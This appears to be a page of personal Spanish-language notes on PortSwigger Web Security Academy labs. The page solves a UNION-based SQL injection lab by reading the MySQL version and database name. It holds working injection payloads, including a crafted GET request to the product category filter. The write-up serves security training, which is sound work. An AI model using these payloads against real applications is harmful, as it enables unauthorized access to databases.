Leunam's PortSwigger
  • 01 SQL Injection
    • 01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
    • 02 Lab: SQL injection vulnerability allowing login bypass
    • 04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
    • 05 Lab: SQL injection attack, listing the database contents on non-Oracle databases
    • 06 Lab: SQL injection attack, listing the database contents on Oracle
    • 11 Lab: Blind SQL injection with conditional responses
    • 12 Lab: Blind SQL injection with conditional errors
    • 13 Lab: Visible error-based SQL injection
    • 14 Lab: Blind SQL injection with time delays
  • 02 Cross-site scripting
    • 03 Lab: DOM XSS in document.write sink using source location.search inside a select element
    • 04 Lab: DOM XSS in innerHTML sink using source location.search
    • 06 Lab: DOM XSS in jQuery selector sink using a hashchange event
    • 07 Lab: Reflected XSS into attribute with angle brackets HTML-encoded
    • 08 Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded
    • 09 Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
    • 22 Lab: Exploiting cross-site scripting to steal cookies
    • 24 Lab: Exploiting XSS to bypass CSRF defenses
  • 03 CSRF
    • 01 Lab: CSRF vulnerability with no defenses
  • 04 Clickjacking
    • 01 Lab: Basic clickjacking with CSRF token protection
    • 02 Lab: Clickjacking with form input data prefilled from a URL parameter
    • 03 Lab: Clickjacking with a frame buster script
  • 06 CORS
    • 01 Lab: CORS vulnerability with basic origin reflection
  • 10 OS Comand Injection
    • 02 Lab: Blind OS command injection with time delays
    • 03 Lab: Blind OS command injection with output redirection
  • 12 Path traversal
    • 01 Lab: File path traversal, simple case
  • 13 Access Control Vulnerability
    • 01 Lab: Unprotected admin functionality
    • 03 Lab: User role controlled by request parameter
    • 04 Lab User role can be modified in user profile 17efab5460ec808c8da6e67d210bf5a2
    • 05 Lab: User ID controlled by request parameter
    • 07 Lab: User ID controlled by request parameter with data leakage in redirect
    • 09 Lab: Insecure direct object references
  • 14 Authentication
    • 01 Lab: Username enumeration via different responses
    • 02 Lab: 2FA simple bypass
    • 03 Lab: Password reset broken logic
  • 15 WebSockets
    • 01 Lab: Manipulating WebSocket messages to exploit vulnerabilities
  • 16 Web cache deception
    • 01 Lab: Exploiting path mapping for web cache deception
  • 20 HTTP Host header attacks
    • 02 Lab: Host header authentication bypass
  • 22 File Upload vulnerabilities
    • 02 Lab Web shell upload via path traversal 17efab5460ec801980d1fa9a1e9e0b67
    • 03 Lab: Web shell upload via path traversal
  • 28 NoSQL Injection
    • 01 Lab Detecting NoSQL injection 17efab5460ec80e19ec7ee42c9d3a627
    • 02 Lab: Exploiting NoSQL injection to extract data
    • 04 Lab: Exploiting NoSQL operator injection to extract unknown fields
  • 29 API Testing
    • 01 Lab: Exploiting server-side parameter pollution in a query string
Powered by GitBook
On this page
  1. 01 SQL Injection

04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

Previous02 Lab: SQL injection vulnerability allowing login bypassNext05 Lab: SQL injection attack, listing the database contents on non-Oracle databases

Last updated 4 months ago

Objetivo

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Solución

Podemos usar '+UNION+SELECT+'abc','def'# para añadir texto directamente al utilizar consultas UNION

Debemos verificar cuantas columnas nos va a devolver nuestra query, podemos utilizar UNION SELECT ‘TEXT1’, ‘TEXT2, ‘TEXT3'# sI vemos que nos muestra error 500, significa que la consulta original no tiene esa cantidad de columnas

Utilizamos el siguiente payload para que nos muestre la versión de la BD y el nombre de la BD

Payload: '+UNION+SELECT+@@version,DATABASE()#
GET /filter?category=Lifestyle'+UNION+SELECT+@@version,DATABASE()#
image.png
image.png
image.png
image.png